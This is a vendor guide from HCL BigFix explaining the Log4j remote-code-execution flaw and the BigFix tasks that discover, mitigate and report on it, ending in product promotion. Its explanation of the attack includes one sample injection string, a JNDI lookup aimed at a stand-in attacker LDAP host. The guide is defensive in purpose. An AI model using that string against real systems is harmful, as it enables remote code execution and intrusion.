HCL BigFix Guide
for Countering the Log4J Vulnerability
Nearly every global enterprise or organization is facing pressure to fix what experts are calling one of the most serious software vulnerabilities in recent memory. It’s ubiquitous and easy to exploit.
The flaw in the Log4j software could allow hackers unfettered access to computer systems and has prompted an urgent warning by the U.S. government’s cybersecurity agency.
Attacks have already taken place less than a day after its reporting. Currently, this vulnerability holds a risk matrix base score of 10 and has been labelled by GitHub advisory as a critical severity level.
What is it?
It is a vulnerability discovered in Apache Log4j, the popular Java library developed and maintained by the Apache foundation. The Log4j library is widely used in many commercial and open-source software products as a Java logging routine. The criticality of the vulnerability has a score of 10/10 in the MITRE.org common vulnerability scoring system (CVSS) indicating the severity.
How is it exploited?
The Log4j can be exploited remotely by an unauthenticated adversary using remote code execution (RCE). If an attacker sends a message that contains a string like ${jndi:ldap://dirtyLDAP.com/X}), an external code class or message lookup may result in the execution of malicious code WITHOUT authentication.
Who is impacted?
Hundreds of millions of devices are at risk including those in government, commercial and home computers. In addition, each affected device may have dozens or hundreds of places where the vulnerable code resides, as logging is an extremely common action in all of computing.
How can BigFix help?
The HCL BigFix team is working alongside our customers, security experts, and IT Operations to produce BigFix content to help you identify and fix the Log4j vulnerabilities in your environment.
BigFix is the essential tool for IT Operations. BigFix automates discovery, management, and remediation of all endpoints whether on-premises, mobile, virtual, or in the cloud – regardless of the operating system, location, or connectivity. With BigFix Insights for Vulnerability Remediation, which integrates with leading vulnerability management solutions like Tenable, vulnerabilities like Log4j can be remediated faster than any other solution in the market.
With BigFix you can discovery, mitigate, remediate vulnerabilities, create pre- and post- remediation reports, and protect remediated endpoints.
DISCOVERY
HCL BigFix has developed tasks to help BigFix users discover Log4J instances and vulnerabilities. We used the Logpresso Log4j scanner because it is an open-source Java-based scanner available on GitHub, developed by the Logpresso technical team, and is freely available to the cybersecurity community.
These tasks download a temporary Java runtime to execute the scan, and do not require Java to be installed on the system. These tasks work on Windows 8.1 and higher (x86 and x64), Mac OS X, Linux (x86, x64, armv71, ppc64, ppc64LE, and s390x), AIX 7.1 TL4 and higher, and Solaris (x86 and SPARC). With a manual download of the JRE, the tasks can also execute on HP-UX.
The following four steps articulates the general process for discovering and reporting on the vulnerability:
1. From the "BES Inventory and License" Content Site, execute Task 602 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only".
2. From the "BES Inventory and License" Content Site, activate Analysis 601 "log4j2-scan results".
3. After scan results have been uploaded to the BigFix Server, view detailed scan results in the Analysis. See the image below.
4. For Executive Reporting, use the "Log4j Vulnerability Report (Logpresso Scan)" view provided in BigFix Web Reports.
MITIGATE
Prior to patches being made available from the application vendors, there are three ways to mitigate the Log4J risk:
1. Use the Logpresso Log4j-scan utility to remove vulnerable Java classes from the affected Log4j-core JAR files.
The Logpresso Log4j-scan utility can perform some remediations on affected Log4j-Core JAR libraries, for both Log4j 2.x and Log4j 1.x. The utility mitigates the worst of the CVEs but may not mitigate all denial-of-service based vulnerabilities. Nonetheless, the utility this can be a very effective step at providing protection while maintaining backward-compatibility with existing applications. For details of the specific mitigations that can be performed by the tool, Contact Us.
2. Replace the Log4j-core- 2.x.jar file with the latest version
HCL BigFix can execute a Logpresso Log4-Scan Mitigation by taking action on Task 603 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – WITH REMEDIATION" from the "BES Inventory and License" Content Site. If this mitigation task causes any application compatibility issues, the original, unmodified versions of the Log4j-core files can be restored by executing Task 604 "Run: log4j2-scan v2.9.2 – Download JRE – UNDO REMEDIATION" from the "BES Inventory and License" Content Site.
After performing a Remediation or Undo Remediation scan, a follow-up Discovery scan should be executed to ensure the latest results are available for reporting.
3. Stop or disable the affected applications or services.
REMEDIATE
As vendors make patches available, BigFix will quickly create, test and deliver BigFix fixlets, available as in-product BigFix content downloads for entitled BigFix customers.
REPORT
With BigFix, reports of the affected systems and libraries can be viewed and archived using BigFix Web Reports that show vulnerability and mitigation status across different points in time.
PROTECT
Once the vulnerability has been remediated, BigFix can ensure it doesn’t reappear. With BigFix, you can schedule recurring scans using the available Detection Task so any new systems or software with the Log4J vulnerability can be identified and remediated.
If you need more assistance please contact Technical Support.
Try BigFix Today!
One endpoint management platform enabling IT Operations and Security teams to automate discovery, management and remediation –whether its on-premise, virtual, or cloud – regardless of operating system, location or connectivity.